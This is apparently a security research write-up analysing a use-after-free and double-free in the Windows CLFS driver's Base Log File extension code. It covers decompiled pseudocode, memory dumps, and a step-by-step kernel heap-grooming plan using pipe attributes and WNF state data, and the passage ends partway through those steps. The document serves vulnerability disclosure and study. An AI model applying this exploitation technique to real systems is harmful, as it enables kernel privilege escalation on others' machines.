        if (Status != 0xc0000011) goto LAB_fffff80122689933;
    }
    else {
        StatusDup = Status;
        UVar4 = CClfsContainer::GetRawSectorSize(this->field_0x98_CclfsContainer);
        this->rawsectorSize = UVar4;
        if ((0xfff < UVar4 - 1) || ((UVar4 & 0x1ff) != 0)) {
            Status = 0xc0000098;
            StatusDup = Status;
            goto LAB_fffff80122689933;
        }

[2]

        Status = ReadImage(this,&ClfsControlRecord);
        if ((int)Status < 0) goto LAB_fffff801226897c8;
        StatusDup = Status;
        Status = CClfsContainer::GetContainerSize(this->CclfsContainer,&this->ContainerSize);
        StatusDup = Status;
        if ((int)Status < 0) goto LAB_fffff80122689933;
        ClfsBaseLogRecord = CClfsBaseFile::GetBaseLogRecord((CClfsBaseFile *)this);
        ControlRecord = ClfsControlRecord;
        if (ClfsBaseLogRecord != NULL) {

[Truncated]

[3]

            if (ClfsControlRecord->eExtendState == 0) goto LAB_fffff80122689933;
            Block = ClfsControlRecord->iExtendBlock;
            if (((((Block != 0) && (Block < this->m_cBlocks)) && (Block < 6)) &&
                ((Block = ClfsControlRecord->iFlushBlock, Block != 0 && (Block < this->m_cBlocks)))) &&
               ((Block < 6 &&
                (m_cbContainer = CClfsBaseFile::GetSize((CClfsBaseFile *)this),
                ControlRecord->cExtendStartSectors < m_cbContainer >> 9 ||
                ControlRecord->cExtendStartSectors == m_cbContainer >> 9)))) {
                cExtendSectors>>1 = ControlRecord->cExtendSectors >> 1;
                uVar8 = (this->m_rgBlocks[ControlRecord->iExtendBlock].cbImage >> 9) + cExtendSectors>>1;
                if (ControlRecord->cNewBlockSectors < uVar8 || ControlRecord->cNewBlockSectors == uVar8) {

[4]

                    Status = ExtendMetadataBlock(this,(uint)ControlRecord->iExtendBlock,cExtendSectors>>1);
                    StatusDup = Status;
                    goto LAB_fffff80122689933;
                }
            }
        }
    }

[Truncated]

}

After initializing some in-memory data structures, CClfsContainer:Open() is called to open the existing Base Log File at [1]. ReadImage() is then called to read the Base Log File at [2]. If the current extend state in the Extend Context is not ClfsExtendStateNone(0) at [3], the
possibility to expand the Base Log File is explored.

If the original sector size before the previous extension (ControlRecord->cExtendStartSectors) is less than or equal to the current sector size of
the Base Log File (m_cbContainer), and the sector size of the Block (to be expanded) after the previous extension (ControlRecord->cNewBlockSectors) is less than or equal to the latest required sector size (current sector size of the Block to be expanded this->m_rgBlocks[ControlRecord->iExtendBlock].cbImage >> 9 plus the number of sectors previously added cExtendSectors >> 1), the Base Log File needs expansion. ExtendMetadataBlock() is duly called at [4].

Note:

  • In all non-malicious cases, the current extend state is expected to be ClfsExtendStateNone(0) when the log file is written to disk.
  • Since the Extend Context is under attacker control (described below), all the fields discussed above can be set by the attacker.

Reading Base Log File

The CClfsBaseFilePersisted::ReadImage() function called at [2] is responsible for reading the Base Log File from disk. The pseudocode of this function is listed below:

int CClfsBaseFilePersisted::ReadImage
              (CClfsBaseFilePersisted *BaseFilePersisted,_CLFS_CONTROL_RECORD **ClfsControlRecordPtr)

{

[Truncated]

[5]

    BaseFilePersisted->m_cBlocks = 6;
    m_rgBlocks = (CLFS_METADATA_BLOCK *)ExAllocatePoolWithTag(0x200,0x90,0x73666c43);
    BaseFilePersisted->m_rgBlocks = m_rgBlocks;

[Truncated]

[6]

        memset(BaseFilePersisted->m_rgBlocks,0,(ulonglong)BaseFilePersisted->m_cBlocks * 0x18);
        memset(BaseFilePersisted->m_rgcBlockReferences,0,(ulonglong)BaseFilePersisted->m_cBlocks * 2);

[7]

        BaseFilePersisted->m_rgBlocks->cbOffset = 0;
        BaseFilePersisted->m_rgBlocks->cbImage = BaseFilePersisted->m_cbRawSectorSize * 2;
        BaseFilePersisted->m_rgBlocks[1].cbOffset = BaseFilePersisted->m_cbRawSectorSize * 2;
        BaseFilePersisted->m_rgBlocks[1].cbImage = BaseFilePersisted->m_cbRawSectorSize * 2;

[8]

        local_48 = CClfsBaseFile::GetControlRecord((CClfsBaseFile *)BaseFilePersisted,ClfsControlRecordPtr);

[9]

                        p_Var2 = BaseFilePersisted->m_rgBlocks->pbImage;
                        for (; (uint)indexIter < (uint)BaseFilePersisted->m_cBlocks;
                            indexIter = (ulonglong)((uint)indexIter + 1)) {
                            ControlRecorD = *ClfsControlRecordPtr;
                            pCVar3 = BaseFilePersisted->m_rgBlocks;
                            pCVar1 = ControlRecorD->rgBlocks + indexIter;
                            uVar6 = *(undefined4 *)((longlong)&pCVar1->pbImage + 4);
                            uVar5 = pCVar1->cbImage;
                            uVar7 = pCVar1->cbOffset;
                            m_rgBlocks = pCVar3 + indexIter;
                            *(undefined4 *)&m_rgBlocks->pbImage = *(undefined4 *)&pCVar1->pbImage;
                            *(undefined4 *)((longlong)&m_rgBlocks->pbImage + 4) = uVar6;
                            m_rgBlocks->cbImage = uVar5;
                            m_rgBlocks->cbOffset = uVar7;
                            pCVar3[indexIter].eBlockType = ControlRecorD->rgBlocks[indexIter].eBlockType;
                            BaseFilePersisted->m_rgBlocks[indexIter].pbImage = NULL;
                        }
                        BaseFilePersisted->m_rgBlocks->pbImage = p_Var2;
                        BaseFilePersisted->m_rgBlocks[1].pbImage = p_Var2;

[10]

                        local_48 = CClfsBaseFile::AcquireMetadataBlock(BaseFilePersisted,ClfsMetaBlockGeneral);
                        if (-1 < (int)local_48) {
                            BaseFilePersisted->field_0x94 = '\x01';
                        }
                        goto LAB_fffff80654e09f9e;

[Truncated]

}

The in-memory buffer of the rgBlocks array, which defines the set of metadata blocks that exist in the Base Log File, is allocated (m_rgBlocks) at [5]. Each array entry is identified by the CLFS_METADATA_BLOCK structure, which is of size 0x18. The cBlocks field, which indicates the number of blocks in the array, is set to the default value 6 (Hence, the size of allocation for m_rgBlocks is 0x18 * 6 = 0x90).

The content in m_rgBlocks is initialized to 0 at [6]. The first two entries in m_rgBlocks are for the Control Record and its shadow, both of which have a fixed size of 0x400. The sizes and offsets for these blocks are duly set at [7].

At this stage, m_rgBlocks looks like the following in memory:

ffffc60c`53904380  00000000`00000000 00000000`00000400
ffffc60c`53904390  00000000`00000000 00000000`00000000
ffffc60c`539043a0  00000400`00000400 00000000`00000000
ffffc60c`539043b0  00000000`00000000 00000000`00000000
ffffc60c`539043c0  00000000`00000000 00000000`00000000
ffffc60c`539043d0  00000000`00000000 00000000`00000000
ffffc60c`539043e0  00000000`00000000 00000000`00000000
ffffc60c`539043f0  00000000`00000000 00000000`00000000
ffffc60c`53904400  00000000`00000000 00000000`00000000

CClfsBaseFile::GetControlRecord() is called to retrieve the Control Record from the Base Log File at [8]. The pbImage field in the first two entries in m_rgBlocks are duly populated. More on this below.

At this stage, m_rgBlocks contains the following values:

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000000
ffffc60c`539043b0  00000000`00000000 00000000`00000000
ffffc60c`539043c0  00000000`00000000 00000000`00000000
ffffc60c`539043d0  00000000`00000000 00000000`00000000
ffffc60c`539043e0  00000000`00000000 00000000`00000000
ffffc60c`539043f0  00000000`00000000 00000000`00000000
ffffc60c`53904400  00000000`00000000 00000000`00000000

The rgBlocks array from the Control Record is copied into m_rgBlocks at [9]. Thus, the sizes and corresponding offsets of each of the metadata blocks is saved.

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  00000000`00000000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 00000000`00000000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

AcquireMetadataBlock() is called with the second parameter set to ClfsMetaBlockGeneral to read in the General Metadata Block from the Base Log File at [10]. The pbImage field for the corresponding entry and its shadow in m_rgBlocks are duly populated. More on this below.

At this stage, m_rgBlocks looks like the following in memory:

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  ffffb60a`b9ead000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 ffffb60a`b9ead000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

It is important to note that the pbImage field for the General Metadata Block and its shadow point to the same memory (refer [17] and [20]).

Reading Control Record

Internally, CClfsBaseFilePersisted::ReadImage() calls CClfsBaseFile::GetControlRecord() to retrieve the Control Record. The pseudocode of
CClfsBaseFile::GetControlRecord() is listed below:

long __thiscall CClfsBaseFile::GetControlRecord(CClfsBaseFile *this,_CLFS_CONTROL_RECORD **ClfsControlRecordptr)

{
    uint iVar4;
    astruct_12 *lVar3;
    _CLFS_LOG_BLOCK_HEADER *pbImage;
    uint RecordOffset;
    uint cbImage;

    *ClfsControlRecordptr = NULL;

[11]

    iVar4 = AcquireMetadataBlock((CClfsBaseFilePersisted *)this,0);
    if (-1 < (int)iVar4) {
        cbImage = this->m_rgBlocks->cbImage;
        ControlMetadataBlock = this->m_rgBlocks->pbImage;
        RecordOffset = pbImage->RecordOffsets[0];
        if (((RecordOffset < cbImage) && (0x6f < RecordOffset)) && (0x67 < cbImage - RecordOffset)) {

[12]

            *ClfsControlRecordptr =
                 (_CLFS_CONTROL_RECORD *)((longlong)ControlMetadataBlock->RecordOffsets + ((ulonglong)RecordOffset - 0x28));
        }
        else {
            iVar4 = 0xc01a000d;
        }
    }
    return (long)iVar4;
}

AcquireMetadataBlock() is called with the second parameter of type _CLFS_METADATA_BLOCK_TYPE set to ClfsMetaBlockControl (0) to acquire the
Control MetaData Block at [11]. The record offset is retrieved and used to calculate the address of the Control Record, which is saved at [12].

Acquiring Metadata Block

The CClfsBaseFile::AcquireMetadataBlock() function is used to acquire a metadata block. The pseudocode of this function is listed below:

int CClfsBaseFile::AcquireMetadataBlock
              (CClfsBaseFilePersisted *ClfsBaseFilePersisted,_CLFS_METADATA_BLOCK_TYPE BlockType)

{
    ulong lVar1;
    longlong BlockTypeDup;

    lVar1 = 0;
    if (((int)BlockType < 0) || ((int)(uint)ClfsBaseFilePersisted->m_cBlocks <= (int)BlockType)) {
        lVar1 = 0xc0000225;
    }
    else {
        BlockTypeDup = (longlong)(int)BlockType;

[13]

        ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] =
             ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] + 1;

[14]

        if ((ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] == 1) &&
           (lVar1 = (*ClfsBaseFilePersisted->vftable->field_0x8)(ClfsBaseFilePersisted,BlockType), (int)lVar1 < 0))
        {
            ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] =
                 ClfsBaseFilePersisted->m_rgcBlockReferences[BlockTypeDup] - 1;
        }
    }
    return (int)lVar1;
}

The m_rgcBlockReferences entry for the Control Metadata Block is increased by 1 to signal its usage at [13].

If the reference count is 1, it is clear the Control Metadata Block was not being actively used (prior to this). In this case, it needs to be read from disk. The second entry in the virtual function table is set to CClfsBaseFilePersisted::ReadMetadataBlock(), which is duly called at [14].

Read Metadata Block

The CClfsBaseFilePersisted::ReadMetadataBlock() function is used to read a metadata block from disk. The pseudocode of this function is listed below:

ulong __thiscall
CClfsBaseFilePersisted::ReadMetadataBlock(CClfsBaseFilePersisted *this,_CLFS_METADATA_BLOCK_TYPE BlockType)

{

[Truncated]

[15]

    cbImage = this->m_rgBlocks[(longlong)_BlockTypeDup].cbImage;
    cbOffset = (PIRP)(ulonglong)this->m_rgBlocks[(longlong)_BlockTypeDup].cbOffset;
    if (cbImage == 0) {
        uVar3 = 0;
    }
    else {
        if (0x6f < cbImage) {

[16]

            ClfsMetadataBlock =
                 (_CLFS_LOG_BLOCK_HEADER *)ExAllocatePoolWithTag(PagedPoolCacheAligned,(ulonglong)cbImage,0x73666c43);
            if (ClfsMetadataBlock == NULL) {
                uVar1 = 0xc000009a;
            }
            else {

[17]

                this->m_rgBlocks[(longlong)_BlockTypeDup].pbImage = ClfsMetadataBlock;
                memset(ClfsMetadataBlock,0,(ulonglong)cbImage);
                *(undefined4 *)&this->field_0xc8 = 0;
                this->field_0xd0 = 0;
                local_40 = local_40 & 0xffffffff00000000;
                local_50 = CONCAT88(local_50._8_8_,ClfsMetadataBlock);

[18]

                uVar5 = CClfsContainer::ReadSector
                                  ((ULONG_PTR)this->CclfsContainer,this->ObjectBody,NULL,(longlong *)local_50,
                                   cbImage >> 9,&cbOffset);
                uVar3 = (ulong)uVar5;
                if (((int)uVar3 < 0) ||
                   (uVar3 = KeWaitForSingleObject(this->ObjectBody,Executive,'\0','\0',NULL), (int)uVar3 < 0))
                goto LAB_fffff801226841ad;
                this_00 = (CClfsBaseFilePersisted *)ClfsMetadataBlock;

[19]

                uVar3 = ClfsDecodeBlock(ClfsMetadataBlock,cbImage >> 9,*(unsigned_char *)&ClfsMetadataBlock->UpdateCount
                                        ,(unsigned_char)0x10,local_res20);

[Truncated]

                    ShadowBlockType = BlockType + ClfsMetaBlockControlShadow;
                    uVar6 = (ulonglong)ShadowBlockType;

                            this->m_rgBlocks[ShadowBlockTypeDup].pbImage = NULL;
                            this->m_rgBlocks[ShadowBlockTypeDup].cbImage =
                                 this->m_rgBlocks[(longlong)_BlockTypeDup].cbImage;

[20]

                            this->m_rgBlocks[ShadowBlockTypeDup].pbImage =
                                 this->m_rgBlocks[(longlong)_BlockTypeDup].pbImage;

[Truncated]

The size of the Metadata block to be read is retrieved and saved in cbImage. Note that these sizes are stored in the Control Record of the Base Log File.

To read the Control Record, the hardcoded value is taken at [15], as the Control Record is of a fixed size. Memory (ClfsMetadataBlock) is allocated to read the metadata block from disk at [16]. The corresponding pbImage entry in m_rgBlocks is filled in and ClfsMetadataBlock is initialized to 0 at [17]. The function CClfsContainer::ReadSector() is called to read the specified number of sectors from disk at [18].

ClfsMetadataBlock now contains the exact contents of the metadata Block as present in the file. It is important to note that the Control Metadata Block contains the Control Context as described earlier. Thus, the contents of the Control Context are fully controlled by the attacker.
ClfsMetadataBlock is decoded via a call to ClfsDecodeBlock at [19]. It is also important to note that in the case of the Control Metadata Block, this does not modify any field in the Control Context. The corresponding shadow pbImage entry in m_rgBlocks is also set to ClfsMetadataBlock at [20].

Extending Metadata Block

The call to ExtendMetadataBlock() at [4] is used to extend the size of a particular metadata block in the Base Log File. The pseudocode of this function pertaining to when the current extend state is ClfsExtendStateFlushingBlock(2) is listed below:

long __thiscall
CClfsBaseFilePersisted::ExtendMetadataBlock
          (CClfsBaseFilePersisted *this,_CLFS_METADATA_BLOCK_TYPE BlockType,unsigned_long cExtendSectors>>1)
{

[Truncated]

    do {
        ret = retDup;
        if (*ExtendPhasePtr != 2) break;
        iFlushBlockPtr = &ClfsControlRecordDup->iFlushBlock;
        iExtendBlockPtr = &ClfsControlRecordDup->iExtendBlock;

[21]

        iFlushBlock = *iFlushBlockPtr;
        iFlushBlockDup = (ulonglong)iFlushBlock;
        iExtendBlock = *iExtendBlockPtr;
        iFlushBlockDup2 = (uint)iFlushBlock;

[22]

        if (((iFlushBlock == iExtendBlock) ||
            (uVar4 = IsShadowBlock(this_00,iFlushBlockDup2,(uint)iExtendBlock),
            uVar4 != (unsigned_char)0x0)) &&
           (this->m_rgBlocks[iFlushBlockDup].cbImage >> 9 <
            ClfsControlRecordDup->cNewBlockSectors)) {
            ExtendMetadataBlockDescriptor
                      (this,iFlushBlockDup2,
                       ClfsControlRecordDup->cExtendSectors >> 1);
            iFlushBlockDup = (ulonglong)*iFlushBlockPtr;
        }
        WriteMetadataBlock(this,(uint)iFlushBlockDup & 0xffff,(unsigned_char)0x0);
        if (*puVar1 == *puVar2) {
            *ExtendPhasePtr = 0;
        }
        else {
            *puVar1 = *puVar1 - 1;

[23]

            ret = ProcessCurrentBlockForExtend(this,ClfsControlRecordDup);
            retDup = ret;
            if ((int)ret < 0) break;
        }

[Truncated]

The index of the block being extended (iFlushBlock) and the block being flushed (iExtendBlock) are extracted from the Extend Context in the Control Record of the Base Log File at [21]. With specially crafted values of the above fields and cNewBlockSectors at [22], code execution reaches ProcessCurrentBlockForExtend() at [23]. ProcessCurrentBlockForExtend() internally calls ExtendMetadataBlockDescriptor(), whose pseudocode is listed below:

long __thiscall
CClfsBaseFilePersisted::ExtendMetadataBlockDescriptor
          (CClfsBaseFilePersisted *this,_CLFS_METADATA_BLOCK_TYPE iFlushBlock,unsigned_long cExtendSectors>>1)

{

[Truncated]

    iFlushBlockDup = (ulonglong)iFlushBlock;
    NewMetadataBlock = NULL;
    RecordHeader = NULL;
    iVar13 = 0;
    uVar3 = this->m_cbRawSectorSize;
    if (uVar3 == 0) {
        NewSize = 0;
    }
    else {
        NewSize = (uVar3 - 1) + this->m_rgBlocks[iFlushBlockDup].cbImage + cExtendSectors>>1 * 0x200 & -uVar3;
    }
    RecordsParamsPtr = this->m_rgBlocks;
    pCVar1 = RecordsParamsPtr + iFlushBlockDup;
    uVar4 = *(undefined4 *)&pCVar1->pbImage;
    uVar5 = *(undefined4 *)((longlong)&pCVar1->pbImage + 4);
    uVar3 = pCVar1->cbImage;
    uVar6 = pCVar1->cbOffset;
    CVar2 = RecordsParamsPtr[iFlushBlockDup].eBlockType;
    ShadowIndex._0_4_ = iFlushBlock + ClfsMetaBlockControlShadow;
    ShadowIndex = (ulonglong)(uint)ShadowIndex;
    uVar7 = IsShadowBlock((CClfsBaseFilePersisted *)ShadowIndex,iFlushBlock,(uint)ShadowIndex);
    if ((uVar7 == (unsigned_char)0x0) &&
       (uVar7 = IsShadowBlock((CClfsBaseFilePersisted *)ShadowIndex,(unsigned_long)ShadowIndex,iFlushBlock),
       uVar7 != (unsigned_char)0x0)) {
        if (RecordsParamsPtr[iFlushBlockDup].pbImage != NULL) {

[24]

            ExFreePoolWithTag(RecordsParamsPtr[iFlushBlockDup].pbImage,0);
            this->m_rgBlocks[iFlushBlockDup].pbImage = NULL;
            RecordsParamsPtr = this->m_rgBlocks;
            ShadowIndex = (ulonglong)(iFlushBlock + ClfsMetaBlockControlShadow);
        }

[25]

        RecordsParamsPtr[iFlushBlockDup].cbImage = RecordsParamsPtr[ShadowIndex].cbImage;
        m_rgBlocksDup = this->m_rgBlocks;
        m_rgBlocksDup[iFlushBlockDup].pbImage = m_rgBlocks[ShadowIndex].pbImage;

[Truncated]


With carefully crafted values in the Control Record of the Base Log File, code execution reaches [24].

At this stage, m_rgBlocks looks like the following in memory:

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  ffffb60a`b9ead000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 ffffb60a`b9ead000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

It is important to note that the pbImage field for the General Metadata Block and its shadow point to the same memory (refer to [17] and [20]). The pbImage field of the iFlushBlock index in m_rgBlocks is freed, and the corresponding entry is cleared at [24]. For example, if iFlushBlock is set to 2, m_rgBlocks looks like the following in memory:

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  00000000`00000000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 ffffb60a`b9ead000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

The entry is then repopulated with the shadow index entry at [25].

ffffc60c`53904380  ffffb60a`b7c79b40 00000000`00000400
ffffc60c`53904390  00000000`00000000 ffffb60a`b7c79b40
ffffc60c`539043a0  00000400`00000400 00000000`00000001
ffffc60c`539043b0  ffffb60a`b9ead000 00000800`00007a00
ffffc60c`539043c0  00000000`00000002 ffffb60a`b9ead000
ffffc60c`539043d0  00008200`00007a00 00000000`00000003
ffffc60c`539043e0  00000000`00000000 0000fc00`00000200
ffffc60c`539043f0  00000000`00000004 00000000`00000000
ffffc60c`53904400  0000fe00`00000200 00000000`00000005

Since the original entry and the shadow index entry pointed to the same memory, the repopulation leaves a reference to freed memory. Any use of the General Metadata Block will refer to this freed memory, resulting in a Use After Free.

The vulnerability can be converted to a double free by closing the handle to the Base Log File. This will trigger a call to FreeMetadataBlock, which will free all pbImage entries in m_rgBlocks.

Exploitation

A basic understanding of the segment heap in the windows kernel introduced since the 19H1 update is required to understand the exploit mechanism. The paper titled “Scoop the Windows 10 pool!” from SSTIC 2020 describes this mechanism in detail.

Windows Notification Facility

Objects from Windows Notification Facility (WNF) are used to groom the heap and convert the use after free into a full exploit. A good understanding of WNF is thus required to understand the exploit. The details about WNF described below are taken from the following sources:

Creating WNF State Name

When a WNF State Name is created via a call to NtCreateWnfStateName(), ExpWnfCreateNameInstance() is called internally to create a name
instance. The pseudocode of ExpWnfCreateNameInstance() is listed below:

ExpWnfCreateNameInstance
          (_WNF_SCOPE_INSTANCE *ScopeInstance,_WNF_STATE_NAME *StateName,undefined4 *param_3,_KPROCESS *param_4,
          _EX_RUNDOWN_REF **param_5)

{

[Truncated]

    uVar23 = (uint)((ulonglong)StateName >> 4) & 3;
    if ((PsInitialSystemProcess == Process) || (uVar23 != 3)) {
        SVar20 = 0xb8;
        if (*(longlong *)(param_3 + 2) == 0) {
            SVar20 = 0xa8;
        }
        NameInstance = (_WNF_NAME_INSTANCE *)ExAllocatePoolWithTag(PagedPool,SVar20,0x20666e57);
    }
    else {
        SVar20 = 0xb8;
        if (*(longlong *)(param_3 + 2) == 0) {

[1]

            SVar20 = 0xa8;
        }

[2]

        NameInstance = (_WNF_NAME_INSTANCE *)ExAllocatePoolWithQuotaTag(9,SVar20,0x20666e57);
    }


A chunk of size 0xa8 (as seen at [1]) is allocated from the Paged Pool at [2] as a structure of type _WNF_NAME_INSTANCE. This results in an allocation of size 0xc0 from the LFH. This structure is listed below:

struct _WNF_NAME_INSTANCE
{
    struct _WNF_NODE_HEADER Header;                                         //0x0
    struct _EX_RUNDOWN_REF RunRef;                                          //0x8
    struct _RTL_BALANCED_NODE TreeLinks;                                    //0x10

    // [3]

    struct _WNF_STATE_NAME_STRUCT StateName;                                //0x28
    struct _WNF_SCOPE_INSTANCE* ScopeInstance;                              //0x30
    struct _WNF_STATE_NAME_REGISTRATION StateNameInfo;                      //0x38
    struct _WNF_LOCK StateDataLock;                                         //0x50

    // [4]

    struct _WNF_STATE_DATA* StateData;                                      //0x58
    ULONG CurrentChangeStamp;                                               //0x60
    VOID* PermanentDataStore;                                               //0x68
    struct _WNF_LOCK StateSubscriptionListLock;                             //0x70
    struct _LIST_ENTRY StateSubscriptionListHead;                           //0x78
    struct _LIST_ENTRY TemporaryNameListEntry;                              //0x88

    // [5]

    struct _EPROCESS* CreatorProcess;                                       //0x98
    LONG DataSubscribersCount;                                              //0xa0
    LONG CurrentDeliveryCount;                                              //0xa4
}; 

Relevant entries in the _WNF_NAME_INSTANCE structure include:

  • StateName: Uniquely identifies the name instance, shown at [3].
  • StateData: Stores the data associated with the instance, shown at [4].
  • CreatorProcess: Stores the address of the _EPROCESS structure of the process that created the name instance, shown at [5].

The StateData is headed by a structure of type _WNF_STATE_DATA. This structure is listed below:

struct _WNF_STATE_DATA
{
    // [6]

    struct _WNF_NODE_HEADER Header;                                         //0x0

    // [7]

    ULONG AllocatedSize;                                                    //0x4
    ULONG DataSize;                                                         //0x8
    ULONG ChangeStamp;                                                      //0xc
}; 

The StateData pointer is referred to when the WNF State Data is updated and queried. The variable-size data immediately follows the _WNF_STATE_DATA structure.

Updating WNF State Data

When the WNF State Data is updated via a call to NtUpdateWnfStateData(), ExpWnfWriteStateData() is called internally to write to the StateData pointer. The pseudocode of ExpWnfWriteStateData() is listed below.

void ExpWnfWriteStateData
               (_WNF_NAME_INSTANCE *NameInstance,void *InputBuffer,ulonglong Length,int MatchingChangeStamp,
               int CheckStamp)

{

[Truncated]

    if (NameInstance->StateData != (_WNF_STATE_DATA *)0x1) {

[8]

        StateData = NameInstance->StateData;
    }
    LengtH = (uint)(Length & 0xffffffff);

[9]

    if (((StateData == NULL) && ((NameInstance->PermanentDataStore != NULL || (LengtH != 0)))) ||

[10]

       ((StateData != NULL && (StateData->AllocatedSize < LengtH)))) {

[Truncated]

[11]

            StateData = (_WNF_STATE_DATA *)ExAllocatePoolWithQuotaTag(9,(ulonglong)(LengtH + 0x10),0x20666e57);

[Truncated]

[12]

        StateData->Header = (_WNF_NODE_HEADER)0x100904;
        StateData->AllocatedSize = LengtH;

[Truncated]

[13]

        RtlCopyMemory(StateData + 1,InputBuffer,Length & 0xffffffff);
        StateData->DataSize = LengtH;
        StateData->ChangeStamp = uVar5;

[Truncated]

    __security_check_cookie(local_30 ^ (ulonglong)&stack0xffffffffffffff08);
    return;
}

The InputBuffer and Length parameters to the function contain the contents and size of the data. It is important to note that these can be controlled by a user.

The StateData pointer is first retrieved from the related name instance of type _WNF_NAME_INSTANCE at [8]. If the StateData pointer is NULL (as is the case initially) at [9], or if the current size is lesser than the size of the new data at [10], memory is allocated from the Paged Pool for the new StateData pointer at [11]. It important to note that the size of allocation is the size of the new data (Length) plus 0x10, to account for the _WNF_STATE_DATA header. The Header and AllocateSize fields shown at [6] and [7] of the _WNF_STATE_DATA header are then initialized at [12].

Note that if the current StateData pointer is large enough for the new data, code execution from [8] jumps directly to [13]. Length bytes from the InputBuffer parameter are then copied into the StateData pointer at [13]. The DataSize field in the _WNF_STATE_DATA header is also filled at [13].

Deleting WNF State Name

A WNF State Name can be deleted via a call to NtDeleteWnfStateName(). Among other things, this function frees the associated name instance and StateData buffers described above.

Querying WNF State Data

When WNF State Data is queried via a call to NtQueryWnfStateData(), ExpWnfReadStateData() is called internally to read from the StateData pointer. The pseudocode of ExpWnfReadStateData() is listed below.

undefined4
ExpWnfReadStateData(_WNF_NAME_INSTANCE *NameInstance,undefined4 *param_2,void *OutBuf,uint OutBufSize,undefined4 *param_5)

{

[Truncated]

[14]

    StateData = NameInstance->StateData;
    if (StateData == NULL) {
        *param_2 = 0;
    }
    else {
        if (StateData != (_WNF_STATE_DATA *)0x1) {
            *param_2 = StateData->ChangeStamp;
            *param_5 = StateData->DataSize;

[15]

            if (OutBufSize < StateData->DataSize) {
                local_48 = 0xc0000023;
            }
            else {

[16]

                RtlCopyMemory(OutBuf,StateData + 1,(ulonglong)StateData->DataSize);
                local_48 = 0;
            }
            goto LAB_fffff8054ce2383f;
        }
        *param_2 = NameInstance->CurrentChangeStamp;
    }


The OutBuf and OutBufSize parameters to the function are provided by the user to store the queried data. The StateData pointer is first retrieved from the related name instance of type _WNF_NAME_INSTANCE at [14]. If the output buffer is large enough to store the data (which is checked at [15]), StateData->DataSize bytes starting right after the StateData header are copied into the output buffer at [16].

Pipe Attributes

After the creation of a pipe, a user has the ability to add attributes to the pipe. The attributes are a key-value pair, and are stored into a linked list. The PipeAttribute object is allocated in the PagedPool, and has the following structure:

struct PipeAttribute {
    LIST_ENTRY list;
    char * AttributeName;
    uint64_t AttributeValueSize;
    char * AttributeValue;
    char data[0];
};

The size of the allocation and the data is fully controlled by an attacker. The AttributeName and AttributeValue are pointers pointing at different offsets of the data field. A pipe attribute can be created on a pipe using the NtFsControlFile syscall, and the 0x11003C control code.

The attribute’s value can then be read using the 0x110038 control code. The AttributeValue pointer and the AttributeValueSize will be used to read the attribute value and return it to the user.

Steps for Exploitation

Exploitation of the vulnerability involves the following steps:

  1. Spray large number of Pipe Attributes of size 0x7a00 to use up all fragmented chunks in VS backend and allocate new ones. The last few will each be allocated on separate segments of size 0x11000, with the last (0x11000-0x7a00) bytes of each segment unused.
  2. Delete one of the later Pipe Attributes. This will consolidate the first 0x7a00 bytes with the remaining bytes in the rest of the segment, and put the entire segment back in the VS backend.
  3. Allocate the vulnerable chunk of size 0x7a00 by opening the malicious Base Log File. This will get allocated from the freed segment in Step 2. Similar to Step 1, the last (0x11000-0x7a00) bytes will be unused. The vulnerable chunk will be freed for the first time shortly afterwards. Similar to Step 2, the entire segment will be back in the VS backend.
  4. Spray large number of WNF_STATE_DATA objects of size 0x1000. This will first use up fragmented chunks in VS backend and then the entire freed segment in Step 3. Note that no size lesser than 0x1000 (and maximum is 0x1000 for WNF_STATE_DATA objects) can be used because that will have an additional header that will corrupt the header in the vulnerable chunk, blocking a double free.
  5. Free the vulnerable chunk for the second time. This will end up freeing the memory of one of the WNF_STATE_DATA objects allocated in Step 4, without actually releasing the object.
  6. Allocate a WNF_STATE_DATA object of size 0x1000 over the freed chunk in Step 5. This will create 2 entirely overlapping WNF_STATE_DATA objects of size 0x1000.
  7. Free all the WNF_STATE_DATA objects allocated in Step 4. This will once again put the entire vulnerable segment (of size 0x11000) back in the VS backend.
